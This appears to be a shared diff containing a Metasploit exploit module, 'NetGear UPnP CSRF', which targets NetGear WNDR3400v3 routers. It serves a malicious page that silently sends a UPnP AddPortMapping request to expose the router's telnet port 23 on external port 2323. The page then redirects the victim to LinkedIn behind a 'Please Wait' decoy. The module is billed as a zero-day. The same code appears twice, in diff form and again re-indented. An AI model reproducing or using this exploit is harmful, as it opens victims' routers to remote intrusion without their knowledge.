phikshun · March 18, 2014 23:44
diff --git a/netgear_upnp_csrf.rb b/netgear_upnp_csrf.rb
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetGear UPnP CSRF',
      'Description'    => %q{
          This module triggers a UPnP mapping via CSRF on the NetGear WNDR3400v3 and other NetGear routers.
      },
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'Platform'       => 'linux',
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true',
        },
      'Targets'        =>
        [
          [ 'Netgear WNDR3400v3', { }, ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '0 day, yo'))

    register_options(
      [
        OptPort.new('EXTPORT', [ true, "The external port to map", 2323 ]),
        OptPort.new('INTPORT', [ true, "The internal port to map", 23 ]),
        OptString.new('INTIP', [ true, "The internal IP to map to", '192.168.1.1' ])
      ], self.class)
  end
  
  def generate_html
    html = <<-EOS
 <html>
 <head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script> 
 <script>
  $(document).ready(function() {
    var postdata = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription>#{Rex::Text.rand_text_alpha(8)}</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>#{datastore['INTIP']}</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>#{datastore['EXTPORT']}</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>#{datastore['INTPORT']}</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
    $.ajax({
      url: 'http://#{datastore['INTIP']}:5000/Public_UPNP_C3',
      type: 'POST',
      data: postdata,
      dataType: 'xml',
      contentType: 'text/plain',
      complete: function() { 
        window.location = "http://www.linkedin.com";
      },
    }); 
  }); 
 </script> 
 </head>
 <body>
 <h1>Redirecting... Please Wait</h1>
 </body>
 </html>
 EOS
  end
  
  def on_request_uri(cli, request)
    print_status("Sending CSRF")
    send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
  end
 end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'NetGear UPnP CSRF',
	'Description' => %q{
	This module triggers a UPnP mapping via CSRF on the NetGear WNDR3400v3 and other NetGear routers.
	},
	'Author' => [ 'phikshun' ],
	'License' => MSF_LICENSE,
	'Version' => '$Revision: 14774 $',
	'References' =>
	[
	[ 'NA', 'NA' ],
	],
	'Platform' => 'linux',
	'Privileged' => false,
	'DefaultOptions' =>
	{
	'DisablePayloadHandler' => 'true',
	},
	'Targets' =>
	[
	[ 'Netgear WNDR3400v3', { }, ],
	],
	'DefaultTarget' => 0,
	'DisclosureDate' => '0 day, yo'))

	register_options(
	[
	OptPort.new('EXTPORT', [ true, "The external port to map", 2323 ]),
	OptPort.new('INTPORT', [ true, "The internal port to map", 23 ]),
	OptString.new('INTIP', [ true, "The internal IP to map to", '192.168.1.1' ])
	], self.class)
	end

	def generate_html
	html = <<-EOS
	<html>
	<head>
	<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script>
	<script>
	$(document).ready(function() {
	var postdata = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription>#{Rex::Text.rand_text_alpha(8)}</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>#{datastore['INTIP']}</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>#{datastore['EXTPORT']}</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>#{datastore['INTPORT']}</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
	$.ajax({
	url: 'http://#{datastore['INTIP']}:5000/Public_UPNP_C3',
	type: 'POST',
	data: postdata,
	dataType: 'xml',
	contentType: 'text/plain',
	complete: function() {
	window.location = "http://www.linkedin.com";
	},
	});
	});
	</script>
	</head>
	<body>
	<h1>Redirecting... Please Wait</h1>
	</body>
	</html>
	EOS
	end

	def on_request_uri(cli, request)
	print_status("Sending CSRF")
	send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
	end
	end